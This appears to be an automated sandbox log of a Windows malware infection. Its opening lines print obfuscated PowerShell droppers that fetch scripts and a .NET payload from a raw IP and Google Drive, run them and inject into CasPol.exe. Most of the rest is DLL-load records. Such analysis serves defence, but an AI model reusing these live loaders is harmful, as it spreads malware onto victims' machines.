IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC85F.tmp" "c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oyzblyj"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: unknown unknown
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
